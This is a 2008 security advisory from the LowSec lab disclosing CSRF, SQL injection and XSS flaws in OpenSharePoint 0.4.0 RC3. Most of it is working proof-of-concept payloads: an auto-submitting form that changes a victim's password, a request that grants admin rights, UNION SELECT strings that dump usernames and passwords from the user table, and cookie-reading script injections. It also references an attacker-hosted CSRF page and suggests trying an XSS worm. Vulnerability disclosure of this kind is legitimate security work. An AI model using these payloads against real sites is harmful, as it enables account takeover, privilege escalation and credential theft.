#=======================================================================#
	.____                   _________            ._.
	|    |    ______  _  __/   _____/ ____   ____| |
	|    |   /  _ \ \/ \/ /\_____  \_/ __ \_/ ___\ |
	|    |__(  <_> )     / /        \  ___/\  \___\|
	|_______ \____/ \/\_/ /_______  /\___  >\___  >_
	        \/                    \/     \/     \/\/
			(http://wwwlowsec.org)
#========================================================================#
Author: C1c4Tr1Z
Date: 28/08/08
Application: OpenSharePoint 0.4.0 RC3 (16/02/2006)
Product WebSite: http://sourceforge.net/projects/opensharepoint/

#========================================================================#
#============================[CSRF]======================================#

This web application don't seems to have a token or protection for the profile
forms. With this simple HTML code we can use those forms to change the users
passwords, and if you modify it a little bit you can change all his info.
If you add an IMG tag somewhere, to exploit this issue:

<img src="http://www.attacker.com/csrf_attack.html"/>

POC:

<form method="POST" name="frmedit" action="http://www.victim.com/dir_to_OSP/module.php" enctype="multipart/form-data">
<input type="hidden" name="modname" value="Profile">
<input type="hidden" name="mf" value="pfedit">
<input type="hidden" name="ac" value="doedit">
<input type="password" name="userPassword00" value="NEW_PASSWORD">
<input type="password" name="userPassword01" value="NEW_PASSWORD">
</form>
<script>frmedit.submit()</script>

Or you can simply make yourself an ADMIN. Remember that the GROUPID number 1
is the admin group.

POC:

<img src="http://www.victim.com/dir_to_OSP/setting.php?modname=User&mf=usredit&usrid=2&ac=3&userFname=hacker&userLname=hacker&userName=USERNAME&userPassword=PASSWORD&userEmail=&userDes=&doclibId=1&userNotify=N&groupId=GROUPID">

#========================================================================#
#=============================[SQLi]=====================================#

If you have access to the website, you can extract other users passwords,
usernames, IDs, etc.*

POC:

/module.php?modname=Document&mf=docfile&doclibId=1 AND 1=0 UNION SELECT 1,2,CONCAT_WS(0x3A,userId,userName,userPassword),4,5,6,7,8 FROM focus_sp_user--
/setting.php?modname=User&mf=usredit&usrid=1 AND 1=0 UNION SELECT 1,2,3,4,5,CONCAT_WS(0x3A,userId,userName,userPassword),7,8,9,10,11 FROM focus_sp_user--&ac=2

(*) The table prefix can be changed during the installation. I used the 
default prefix: focus_sp.

#========================================================================#
#=============================[XSS]======================================#

You are hable to steal the users cookies or make any type of accion/changes
with JavaScript. You may want to try if some XSS worm with XHR works :)).

POC:

/module.php?modname=Document&doclibId=1&mf=docfind&ac=dofind&keyword="><img/src/onerror=alert(document.cookie) foo="&lookin=0
/module.php?modname=Appointment&stamp=1217473200"><img/src/onerror=alert(document.cookie) foo="

#========================================================================#
#========================================================================#
Contact:     C1c4Tr1Z <c1c4tr1z@lowsec.org>
		(http://wwwlowsec.org)
	LowSec! Web Application Security (Lab).
		   Deus ex Machina
#========================================================================#